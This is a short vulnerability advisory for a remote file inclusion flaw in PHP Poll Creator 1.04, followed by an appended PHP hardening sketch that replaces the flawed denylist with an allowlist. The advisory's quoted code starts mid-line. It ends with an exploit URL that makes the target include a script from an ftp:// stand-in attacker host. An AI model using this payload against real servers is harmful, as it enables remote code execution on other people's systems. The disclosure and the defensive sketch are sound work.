phpPC 1.04 Multiple Remote File Inclusion

Script        : PHP Poll Creator
Version       : 1.04
Vendor URL    : http://www.phppc.de
Impact        : Remote File Inclusion
Discovered by : iss4m
Contact       : iss4m.1@gmail.com

Vulnerable code in poll.php
--------------------------------

= 1 OR substr_count($relativer_pfad,"../") >= 1) $relativer_pfad = "";
if ($is_phppc_included != 1) {
    $file = "lib/functions.inc.php";
    include $relativer_pfad.$file;
}
include ($relativer_pfad . "layout_top_sm.inc.php");

The script only checks whether $relativer_pfad contains "http://", but we can include a remote file using ftp://

Exploit :
**********

http://localhost/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=ftp://user:pass@ftp.attacker.ltd/script.txt ?

# milw0rm.com [2006-11-21]
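A hardening sketch for the include logic above, as an added example that is not part of the original advisory or of phpPC: it contrasts the denylist the advisory describes with an allowlist resolver that only returns paths inside a fixed base directory. The names PHPPC_ALLOWED, legacy_prefix() and safe_include_path() are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example, not phpPC code. PHPPC_ALLOWED, legacy_prefix() and
// safe_include_path() are hypothetical names.

// Files the application may include (names from the advisory's snippet).
const PHPPC_ALLOWED = ['lib/functions.inc.php', 'layout_top_sm.inc.php'];

// Denylist as the advisory describes it (reconstructed from its text).
function legacy_prefix(string $prefix): string
{
    $bad = substr_count($prefix, 'http://') >= 1 || substr_count($prefix, '../') >= 1;
    return $bad ? '' : $prefix;
}

// Allowlist approach: the file must be a known name, and the resolved path
// must exist and stay inside the base directory.
function safe_include_path(string $base, string $file): ?string
{
    if (!in_array($file, PHPPC_ALLOWED, true)) {
        return null;
    }
    // realpath() resolves local filesystem paths only; URL wrappers yield false.
    $root = realpath($base);
    if ($root === false || !is_dir($root)) {
        return null;
    }
    $path = realpath($root . DIRECTORY_SEPARATOR . $file);
    $inside = $path !== false
        && strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) === 0;
    return $inside ? $path : null;
}

// Constructed demo: a temporary base directory holding one template file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'phppc_demo_' . getmypid();
@mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'layout_top_sm.inc.php', "<?php // demo\n");

// Constructed prefixes; example.invalid is a placeholder host. The request
// value is passed as the base only to show it is rejected; in real use the
// base is a constant set by the application.
foreach (['', '../', 'http://example.invalid/', 'ftp://example.invalid/'] as $prefix) {
    $legacy = legacy_prefix($prefix) . 'layout_top_sm.inc.php';
    $fixed  = safe_include_path($prefix === '' ? $base : $prefix, 'layout_top_sm.inc.php');
    printf("%-26s legacy=%-46s hardened=%s\n",
        var_export($prefix, true), $legacy, var_export($fixed, true));
}
```

With `allow_url_include` set to Off (the default since PHP 5.2.0), include refuses URL wrappers such as ftp:// regardless of application-level checks.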